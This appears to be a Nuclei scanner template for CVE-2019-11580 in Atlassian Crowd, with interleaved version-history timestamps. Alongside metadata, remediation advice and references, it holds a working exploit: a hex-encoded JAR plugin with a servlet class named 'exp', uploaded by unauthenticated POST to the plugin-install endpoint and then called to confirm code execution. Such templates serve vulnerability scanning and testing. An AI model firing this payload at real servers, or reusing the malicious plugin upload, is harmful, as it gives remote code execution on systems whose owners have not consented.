2021-01-02 04:59:06 +00:00
id : CVE-2019-11580
2020-08-16 15:54:45 +00:00
info :
2023-09-05 09:04:47 +00:00
name : Atlassian Crowd and Crowd Data Center - Unauthenticated Remote Code Execution
2020-08-16 15:54:45 +00:00
author : dwisiswant0
severity : critical
2022-05-17 09:18:12 +00:00
description : Atlassian Crowd and Crowd Data Center is susceptible to a remote code execution vulnerability because the pdkinstall development plugin is incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.
2023-09-06 12:53:28 +00:00
remediation : |
Upgrade to Atlassian Crowd and Crowd Data Center version 3.4.3 or later to mitigate this vulnerability.
2021-03-26 06:43:58 +00:00
reference :
- https://github.com/jas502n/CVE-2019-11580
2021-03-26 06:44:13 +00:00
- https://jira.atlassian.com/browse/CWD-5388
2022-04-01 08:51:42 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-11580
2023-04-12 10:55:48 +00:00
- http://packetstormsecurity.com/files/163810/Atlassian-Crowd-pdkinstall-Remote-Code-Execution.html
2021-09-10 11:26:40 +00:00
classification :
2022-05-17 09:18:12 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2019-11580
2023-10-14 11:27:55 +00:00
epss-score : 0.97475
2023-11-14 05:56:48 +00:00
epss-percentile : 0.99962
2023-09-06 12:53:28 +00:00
cpe : cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*
2022-07-04 13:18:46 +00:00
metadata :
2023-09-09 17:06:23 +00:00
max-request : 2
2023-10-14 11:27:55 +00:00
vendor : atlassian
2023-07-11 19:49:27 +00:00
product : crowd
2023-09-06 12:53:28 +00:00
shodan-query : http.component:"Atlassian Jira"
2023-09-05 09:04:47 +00:00
tags : cve,cve2019,packetstorm,kev,atlassian,rce,intrusive,unauth
variables :
plugin : '{{hex_decode("504b0304140000000800033f2557544c2527eb0000000402000014001c0061746c61737369616e2d706c7567696e2e786d6c555409000316dff66410e4f66475780b000104e803000004e80300007d91416ec3201045d7ce29107b20c91a23e50039c4044f53140c16e0a8bd7d260527ae5595dd7c66febc0f1a8a879c1d0431f9f9ea02bbe177cf6d1ca51dbccc9fe8bdc4af89b30023f6fcb4b4b33304b862e2acce6571c7945d0c3d3f72669f5d7fd9981da3a3eb8c70e12356a5aa90606c8bde5c0314101643c124c87082e22e1eb9296946ad7e66561e03669bdc5488c46c61473269b85aad1bdfe32d8439c8bddc6bb594955afdc2de753a63ba7b2c0d99f2f9e80aaf4ff8aafe798beee93a272f2814c50b4691aed55aa93d6bd80bd8db106362505823caaa9128dab089d6e9e59290b5dafe37890f504b03040a0000000000033f255700000000000000000000000004001c00636f6d2f555409000316dff664bae3f66475780b000104e803000004e8030000504b03040a0000000000033f255700000000000000000000000008001c00636f6d2f63646c2f555409000316dff664bae3f66475780b000104e803000004e8030000504b03040a0000000000854225570000000000000000000000000e001c00636f6d2f63646c2f7368656c6c2f5554090003b9e4f664b9e4f66475780b000104e803000004e8030000504b0304140000000800bd422557a3de4c61670100004602000017001c00636f6d2f63646c2f7368656c6c2f6578702e636c617373555409000326e5f664b9e4f66475780b000104e803000004e80300008d51c94e0241107d25cb208c22e2bea05e0c18b1c1c4a8c17821b824440d183c237470cc3883330df25b5e347af003fc2863b5b870523be95a5ebfeaaa7efdfaf6fc02601bcb51849188611cc90826a298c4948169033384f09ee5586a9f1048676a8460d16d4a42bc6c39f2a4737329bdf3faa5cd48a8e91e4a45a8a4cbd7f56ebd277ce9756da9c495526d71c4a6da072af2b6237d55f893e6b75dc79705dd355aea35645b590c1898e5bcea76bc863cb074e788ecb537f465260c440ccc9998c70261b4582b653773f9dd6c3ebfb59333b06822852542a2e1de8846d316fe95b46dc1e584d4efd310929a202c571c9f7e0f4358fddf2308c32da92e3c4b498f309dce94bf6e3bf32ce7f3a030d064006669ef744098ec4b2becbad31255c59416ab831584f8f7f41a026909d80e73b6c89ed887d61e41f71cb06e6cc31fa0b631985ca2a969f601f6e6fa138608e38107047f2aa27c0ae6c5381ae128c8f828eff847cbb177504b03041400000008003a422557483e79dabf0000000f01000016001c00636f6d2f63646c2f7368656c6c2f6578702e6a617661555409000330e4f66430e4f66475780b000104e803000004e8030000558e416bc3300c85effe15a2a7642ca2290c36721c61eda9d0417bf61cd1787363d75293c0c87fafdbf5903d1008bdf73d14b4f9d14702e34f681a87dc92739552f6147c14f8d6bd1e9129f68e045b91804fd5dc44eb71b3ad474341acef12192e5fce1a304e33038d218d50d730ac13fdf9d704bf4a41d223db7bdb40e33f48b2596847e70bb140a4f333fcbb73f01d5332380769a31f18663fa472782825f0487288562866390eb7255bbcefeb62b52cdf8ab27c795d2ef2ea0e4c6a5257504b01021e03140000000800033f2557544c2527eb00000004020000140018000000000001000000fd810000000061746c61737369616e2d706c7567696e2e786d6c555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000033f2557000000000000000000000000040018000000000000001000fd4139010000636f6d2f555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000033f2557000000000000000000000000080018000000000000001000fd4177010000636f6d2f63646c2f555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000854225570000000000000000000000000e0018000000000000001000fd41b9010000636f6d2f63646c2f7368656c6c2f5554050003b9e4f66475780b000104e803000004e8030000504b01021e03140000000800bd422557a3de4c616701000046020000170018000000000000000000b48101020000636f6d2f63646c2f7368656c6c2f6578702e636c617373555405000326e5f66475780b000104e803000004e8030000504b01021e031400000008003a422557483e79dabf0000000f010000160018000000000001000000b481b9030000636f6d2f63646c2f7368656c6c2f6578702e6a617661555405000330e4f66475780b000104e803000004e8030000504b05060000000006000600ff010000c80400000000")}}'
2020-08-16 15:54:45 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-09-05 09:04:47 +00:00
- raw :
- |
POST /crowd/admin/uploadplugin.action HTTP/2
Host : {{Hostname}}
Accept-Encoding : gzip, deflate
Content-Type : multipart/mixed; boundary=----------------------------f15fe87e95a7
Expect : 100 -continue
------------------------------f15fe87e95a7
Content-Disposition : form-data; name="file_cdl"; filename="rce.jar"
Content-Type : application/octet-stream
{{plugin}}
------------------------------f15fe87e95a7--
- |
GET /crowd/plugins/servlet/exp HTTP/2
Host : {{Hostname}}
2023-07-11 19:49:27 +00:00
2020-08-16 15:54:45 +00:00
matchers :
- type : word
2023-09-05 09:04:47 +00:00
part : body_2
2020-08-16 15:54:45 +00:00
words :
2023-09-05 09:04:47 +00:00
- "CVE-2019-11580"
2023-11-14 10:20:39 +00:00
# digest: 4a0a004730450221008533ed64edd0af7b707f2a3e6f64677fa8e47068653278e997cb44e9c17edf4202200d70464b0154a975b9710ea252786eb8543a88aca0d5d51af942785c50663c5c:922c64590222798bb761d5b6d8e72950